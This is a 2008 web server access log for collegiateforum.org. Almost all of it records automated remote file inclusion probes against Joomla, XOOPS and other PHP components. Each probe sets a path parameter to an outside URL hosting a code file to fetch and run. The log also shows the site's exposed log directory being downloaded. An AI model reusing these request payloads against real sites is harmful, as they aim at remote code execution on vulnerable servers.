219.117.239.114 - - [10/Aug/2008:18:39:20 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.65" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:18:39:57 -0700] "GET /logs/access_080121.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:18:39:57 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:18:39:57 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:40:20 -0700] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:40:20 -0700] "GET /logs/access.log/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:40:20 -0700] "GET /logs/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
64.13.251.55 - - [10/Aug/2008:18:41:36 -0700] "GET /logs/access_080114.log/Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.13.251.55 - - [10/Aug/2008:18:41:36 -0700] "GET /Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.13.251.55 - - [10/Aug/2008:18:41:36 -0700] "GET /logs/Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:41:44 -0700] "GET /logs/access_080331.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:41:44 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:41:45 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:42:40 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:44:27 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:18:44:31 -0700] "GET /logs/access_080324.log//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:18:44:31 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:18:44:31 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
90.30.243.235 - - [10/Aug/2008:18:45:49 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 655360 "http://209.85.135.104/search?q=cache:SOFwoIQUKcYJ:www.collegiateforum.org/logs/+index+of+/.logs&hl=fr&ct=clnk&cd=2&gl=fr&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.collegiateforum.org"
90.30.243.235 - - [10/Aug/2008:18:46:01 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 655360 "http://209.85.135.104/search?q=cache:SOFwoIQUKcYJ:www.collegiateforum.org/logs/+index+of+/.logs&hl=fr&ct=clnk&cd=2&gl=fr&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:46:16 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.13.251.55 - - [10/Aug/2008:18:46:20 -0700] "GET /logs/access.log/Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.13.251.55 - - [10/Aug/2008:18:46:21 -0700] "GET /Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.13.251.55 - - [10/Aug/2008:18:46:21 -0700] "GET /logs/Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:18:46:37 -0700] "GET /logs/access_080331.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:18:46:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:18:46:38 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:48:32 -0700] "GET /logs/access_080204.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:48:32 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:48:53 -0700] "GET /logs/access.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:48:53 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:48:53 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:18:50:35 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:18:50:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:18:50:36 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:50:57 -0700] "GET /logs/access_080204.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:51:42 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:51:42 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
74.6.8.122 - - [10/Aug/2008:18:51:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:52:10 -0700] "GET /logs/access.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:52:11 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:52:11 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
74.6.8.122 - - [10/Aug/2008:18:52:22 -0700] "GET /logs/access_080317.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:18:52:42 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:54:48 -0700] "GET /logs/access_080331.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:54:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:54:49 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:55:57 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:55:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:56:08 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:56:19 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:56:19 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:57:35 -0700] "GET /logs/access_080204.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:57:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:18:57:35 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:57:46 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:57:46 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:18:58:01 -0700] "GET /logs/access_080324.log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:18:58:01 -0700] "GET /logs/access_080324.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:18:58:04 -0700] "GET /oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:18:58:04 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:18:58:11 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.65" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:58:12 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:58:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:58:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:58:20 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:18:58:21 -0700] "GET /logs/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:58:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:58:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:58:37 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:58:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:59:42 -0700] "GET /logs/access_080324.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:59:42 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:59:42 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:59:51 -0700] "GET /logs/access_080324.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:59:51 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:59:51 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:59:55 -0700] "GET /logs/access_080331.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:59:55 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:59:55 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:00:35 -0700] "GET /logs/access_080324.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:00:35 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:00:35 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:00:42 -0700] "GET /logs/access_080324.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:19:01:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:19:01:12 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:01:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:01:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:19:01:53 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:19:01:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:19:01:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:19:01:56 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:02:55 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:19:03:06 -0700] "GET /logs//components/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:19:03:06 -0700] "GET //components/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:03:11 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:03:11 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:03:12 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:03:13 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:03:14 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:03:14 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:03:14 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:03:14 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:03:14 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:03:19 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:03:19 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
